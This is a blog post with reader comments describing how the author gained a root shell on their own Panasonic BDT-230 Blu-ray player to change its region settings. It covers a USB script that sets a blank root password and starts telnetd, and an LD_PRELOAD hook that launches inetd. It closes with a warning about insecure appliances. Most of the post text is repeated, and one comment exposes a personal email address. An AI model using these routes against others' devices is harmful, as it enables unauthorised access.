![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
mjg59I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.
Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.
Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Runnings strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.
/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.
But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.
The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. The simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.
Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Runnings strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.
/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.
But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:
export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so, so then it was just a matter of building a library that hooked open() and launched inetd and dropping that into the right place, and then opening the browser.
This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.
The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
GPL
Date: 2014-04-21 07:53 am (UTC)Re: GPL
Date: 2014-04-21 01:42 pm (UTC)RSA Signatures
Date: 2014-04-21 08:25 am (UTC)Re: RSA Signatures
Date: 2014-04-21 01:45 pm (UTC)no subject
Date: 2014-04-21 12:40 pm (UTC)no subject
Date: 2014-04-21 01:43 pm (UTC)no subject
Date: 2014-04-21 02:48 pm (UTC)Please consider this a fair punishment for hosting a blog on dreamwidth.org (which is completely blocked in Russia by its IP address, that's why I have to post this comment through Tor) :)
Still, congratulations for a successful hack.
References on building a library?
Date: 2014-04-21 04:27 pm (UTC)I'm not really sure where to start, but I'm certainly interested in trying to hack my player!
Thanks!
Re: References on building a library?
Date: 2014-04-21 04:30 pm (UTC)Re: References on building a library?
Date: 2014-04-21 08:52 pm (UTC)--j1
no subject
Date: 2014-04-21 07:24 pm (UTC)no subject
Date: 2014-04-22 10:52 am (UTC)(This is tempting me to look at my BD player; I'd love to be able to get rid of the DVD player which I only have to play my UK region 2 disks)
no subject
Date: 2014-04-22 01:48 pm (UTC)no subject
Date: 2014-04-23 03:35 pm (UTC)no subject
Date: 2014-04-23 11:32 pm (UTC)libSegFault.so
Date: 2014-05-10 05:24 pm (UTC)Is there any chance that you can share/send via email the libSegFault.so?
Re: libSegFault.so
Date: 2014-05-10 06:00 pm (UTC)Sure, no security for you.
Date: 2014-05-12 12:34 am (UTC)Hacked Panasonic DMP-BD79
Date: 2014-07-18 10:33 am (UTC)I've stopped any further activities because the CPU is too slow IMHO:
-sh-3.2# time sh -c "dd if=/dev/urandom bs=1M count=64 | gzip -9 > /dev/null "
64+0 records in
64+0 records out
67108864 bytes (67 MB) copied, 107.929 s, 622 kB/s
real 1m48.034s
user 0m48.835s
sys 0m57.991s
So no reason to try to get XBMC running on that box.
Cheers Leif
Re: Hacked Panasonic DMP-BD79
Date: 2015-02-10 04:42 am (UTC)Re: Hacked Panasonic DMP-BD79
Date: 2015-12-12 06:05 am (UTC)My hotmail: francibolsilludo@hotmail.com